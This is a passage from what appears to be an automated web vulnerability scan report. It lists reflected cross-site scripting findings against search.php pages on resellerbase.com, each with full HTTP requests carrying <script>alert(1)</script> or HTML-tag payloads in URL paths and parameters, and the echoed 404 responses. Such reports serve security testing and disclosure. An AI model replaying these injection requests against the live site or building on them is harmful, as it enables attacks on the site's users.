<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/reviewce485<script>alert(1)</script>a2a3b086d6d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5604. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6283a<script>alert(1)</script>134b4443e54 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php6283a<script>alert(1)</script>134b4443e54?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/search.php6283a<script>alert(1)</script>134b4443e54?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5605. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7068a<a>aef85ec6694 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search7068a<a>aef85ec6694&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search7068a<a>aef85ec6694&opt=2 was not found on this server.</p>
...[SNIP]...

2.5606. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 267df<a>ea62005dcd4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...267df<a>ea62005dcd4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...267df<a>ea62005dcd4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5607. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2e707<script>alert(1)</script>4a9181f29fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&2e707<script>alert(1)</script>4a9181f29fe=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&2e707<script>alert(1)</script>4a9181f29fe=1 was not found on this server.</p>
...[SNIP]...

2.5608. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9b8e3<a>de3f150613b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=29b8e3<a>de3f150613b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=29b8e3<a>de3f150613b was not found on this server.</p>
...[SNIP]...

2.5609. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c4a4b<script>alert(1)</script>ea085508ea5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicec4a4b<script>alert(1)</script>ea085508ea5/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicec4a4b<script>alert(1)</script>ea085508ea5/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5610. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27946<script>alert(1)</script>d9f5287521e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting27946<script>alert(1)</script>d9f5287521e/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting27946<script>alert(1)</script>d9f5287521e/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5611. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 45940<script>alert(1)</script>f6da0e534ea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes45940<script>alert(1)</script>f6da0e534ea/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes45940<script>alert(1)</script>f6da0e534ea/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5612. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2371<script>alert(1)</script>10273af046a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmosb2371<script>alert(1)</script>10273af046a/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmosb2371<script>alert(1)</script>10273af046a/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5613. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c7647<script>alert(1)</script>589e2cba02e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/imagesc7647<script>alert(1)</script>589e2cba02e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/imagesc7647<script>alert(1)</script>589e2cba02e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5614. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b641c<script>alert(1)</script>fac8cee579f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/search.phpb641c<script>alert(1)</script>fac8cee579f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/search.phpb641c<script>alert(1)</script>fac8cee579f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5615. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e829e<a>ed3ef33ffb5 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche829e<a>ed3ef33ffb5&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche829e<a>ed3ef33ffb5&opt=2 was not found on this server.</p>
...[SNIP]...

2.5616. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ed665<a>af82138d64b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...ed665<a>af82138d64b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...ed665<a>af82138d64b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5617. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ac24<script>alert(1)</script>da39714adc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&5ac24<script>alert(1)</script>da39714adc0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&5ac24<script>alert(1)</script>da39714adc0=1 was not found on this server.</p>
...[SNIP]...

2.5618. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4f1ff<a>3679e8e1157 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=24f1ff<a>3679e8e1157 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=24f1ff<a>3679e8e1157 was not found on this server.</p>
...[SNIP]...

2.5619. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98818<script>alert(1)</script>a53943327d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service98818<script>alert(1)</script>a53943327d0/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service98818<script>alert(1)</script>a53943327d0/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5620. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b8e7<script>alert(1)</script>7b369e94025 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting7b8e7<script>alert(1)</script>7b369e94025/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting7b8e7<script>alert(1)</script>7b369e94025/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5621. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 3]

